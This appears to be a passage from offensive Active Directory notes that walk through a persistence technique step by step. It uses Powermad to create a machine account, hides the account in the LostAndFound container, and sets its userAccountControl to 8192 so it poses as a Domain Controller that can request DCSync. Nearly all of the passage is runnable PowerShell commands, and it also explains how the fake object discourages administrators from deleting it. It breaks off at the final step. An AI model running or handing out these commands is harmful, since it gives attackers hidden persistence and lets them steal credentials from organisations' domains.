You create a computer object and then change an attribute by promoting it to a Domain Controller. By doing this it will not have the powers of a real Domain Controller but it can request DCSync and the moment the IT Admin gets suspicious and deletes it, ADUC will alert him by telling him that it is a Domain Controller:

Use the following tool:

https://github.com/Kevin-Robertson/Powermad

		Import-Module .\\Powermad.psm1

As Domain Admin create a new account computer:

New-MachineAccount -MachineAccount <fakeDCName> -Password $(Convert-ToSecureString 'Password123' -AsPlainText -Force) -Domain '<domain>' -DomainController '<domain-controller>'

Import Active Directory module:

Import-Module .\\ADModule-master\\Microsoft.ActiveDirectory.Management.dll

Move the newly created computer account inside a strange container as LostAndFound:

Get-ADComputer -Identity <fakeDCName> | Move-ADObject -TargetPath 'CN=LostAndFound,DC=domain,DC=domain,DC=domain' -Verbose

Import PowerView module:

. .\\PowerView.ps1

Get UserAccountControl attribute to verify the identity of a machine (DC → 8192 SERVER_TRUST_ACCOUNT or computer → 515 WORKSTATION_TRUST_ACCOUNT):

Get-DomainComputer <fakeDCName> | select name,useraccountcontrol,PrimaryGroupID

Change the attribute to make it a Domain Controller:

Get-DomainObject -Identity <fakeDCName> -Set @{ "useraccountcontrol" = 8192 } -Verbose

Now is a domain controller: